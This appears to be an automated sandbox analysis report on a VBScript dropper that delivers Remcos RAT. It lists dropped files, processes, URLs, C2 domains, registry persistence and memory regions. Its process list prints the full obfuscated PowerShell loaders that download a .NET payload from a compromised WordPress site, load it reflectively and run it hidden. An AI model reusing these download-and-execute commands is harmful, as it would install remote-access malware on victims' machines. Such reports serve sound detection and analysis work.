Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
sostener.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sostener.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\sostener.vbs:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xx1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xx2.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tidacm4.zpe.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15mipq2n.gkf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jh1qeit.h2y.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1owxtdep.dvi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xfjnky4.y2i.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fkrqk5e.gr4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m3qld52.azy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4y5wi1go.v5n.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5azf1hna.s1i.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lscxdeq.sec.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alyyas5a.uto.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0tr5l43.acd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b54ungvz.fqw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbe3en2g.hpi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_biwkrxkp.c4x.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5pjfiyp.5xi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fagm5ipp.5cr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gq30w00h.b3z.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imq5g0pq.hhd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jc0v5ugi.tpd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l44brpxj.3di.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvdtgqkm.54d.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0osc13k.imw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2hlp5r1.kve.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npbstxtj.cgq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otuxuszo.00z.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxop0tqe.x3s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyhyjbwx.k3o.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmfyzqut.zxa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcroe1lr.4lx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0cegv2o.hm1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjvepcxu.vfo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdnosrkf.l1v.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdqjoos4.kjc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfprz31m.jnj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzn3mnah.m2e.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbzzq4en.vsj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wudfb3wh.eun.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0limvup.bn3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr0nzqwr.033.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzajo4ck.a4q.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycgpqw3e.3ld.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvconnxd.ft0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziigamrt.ojs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv0m5ily.2vy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzwnqnqy.rly.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF57b4b2.TMP
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CET0BENF6MBIOKFMXJA3.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NIYB5O5YSJK0Z4IHZ95W.temp
|
data
|
dropped
|
There are 49 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt
Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM
bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD
Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4
bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm
GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8
YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d
BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0
C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H
bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf
F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8
Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('
','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]]
$nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null,
[object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------',
$bikyg, '1', 'Roda' ));"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs'
"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt
Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM
bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD
Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4
bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm
GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8
YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d
BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0
C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H
bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf
F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8
Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('
','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]]
$nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null,
[object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------',
$bikyg, '1', 'Roda' ));"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs'
"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt
Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM
bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD
Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4
bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm
GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8
YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d
BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0
C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H
bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf
F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8
Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('
','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]]
$nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null,
[object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------',
$bikyg, '1', 'Roda' ));"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 29 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt
|
15.235.85.194
|
||
https://www.informacionoportuna.com/wp-content/uploads/2024/07/remcos.txt
|
15.235.85.194
|
||
https://www.informacionoportuna.com/wp-content/uploads/2024/
|
unknown
|
||
https://www.informacionoportuna.com
|
unknown
|
||
special2023.duckdns.org
|
|||
https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txt
|
15.235.85.194
|
||
HTTPS://WWW.INFORMACIONOPORTUNA.COM/WP-CONTENT/UPLOADS/2024/07/REMCOS.TXT
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://geoplugin.net/json.gpl
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://informacionoportuna.com
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://aka.ms/pscore6
|
unknown
|
||
http://www.informacionoportuna.com
|
unknown
|
||
https://www.informacionoportuna.com/wp-content/uploads/2024/07/r
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://geoplugin.net/json.gpSystem32
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
http://crl.m
|
unknown
|
||
http://geoplugin.net/json.gp/C
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://crl.v
|
unknown
|
||
https://oneget.org
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
informacionoportuna.com
|
15.235.85.194
|
||
comandoespecial2023.duckdns.org
|
173.208.241.155
|
||
www.informacionoportuna.com
|
unknown
|
||
geoplugin.net
|
178.237.33.50
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
15.235.85.194
|
informacionoportuna.com
|
United States
|
||
173.208.241.155
|
comandoespecial2023.duckdns.org
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
_______________________-------------
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-3PWW8O
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-3PWW8O
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-3PWW8O
|
time
|
There are 8 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
677000
|
heap
|
page read and write
|
||
29B2A4A0000
|
trusted library allocation
|
page read and write
|
||
29B2A788000
|
trusted library allocation
|
page read and write
|
||
23A4A8EC000
|
trusted library allocation
|
page read and write
|
||
29B32A20000
|
trusted library section
|
page read and write
|
||
1B9A399D000
|
trusted library allocation
|
page read and write
|
||
2DEF000
|
stack
|
page read and write
|
||
1217000
|
heap
|
page read and write
|
||
967000
|
heap
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
1B9943D2000
|
trusted library allocation
|
page read and write
|
||
29B1BAA4000
|
trusted library allocation
|
page read and write
|
||
1B9ABFB0000
|
heap
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
29B1A300000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
1C29A95B000
|
heap
|
page read and write
|
||
20FEA060000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
155ACCB7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B902000
|
trusted library allocation
|
page read and write
|
||
1EA4F011000
|
trusted library allocation
|
page read and write
|
||
120A6C1A000
|
heap
|
